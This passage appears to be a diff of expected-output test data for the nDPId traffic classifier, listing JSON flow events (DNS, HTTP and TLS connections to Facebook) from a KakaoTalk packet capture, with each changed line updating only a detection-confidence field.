-00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1430069030703,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069030703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEBYBQANQAqICQnwAEAAAEAAAAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01003{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1430069030748,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069030748,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGbtpgAANREvUAq8AQEKGFK8ADVgFABSeRsnwIGAAAEAAgAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAD6wAMBHN0YXIEYzEwcsAQwC4AAQABAAAACQAEHw1EVA=="} -00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} +00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1430069030978,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":80,"pkt_l4_len":44,"thread_ts_msec":1430069030978,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEAAAEAAQBHSHAoYUrwKvAEBTH4ANQAsPIiqhwEAAAEAAAAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAE="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} +01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1430069031017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":138,"pkt_l4_len":102,"thread_ts_msec":1430069031017,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHocCwAANREA2Aq8AQEKGFK8ADVMfgBmmjSqh4GAAAEAAwAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAHADAAFAAEAAAVxAAYDYXBpwBLAMAAFAAEAAAV2AAwEc3RhcgRjMTBywBLAQgABAAEAAAARAAQfDURG"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}} 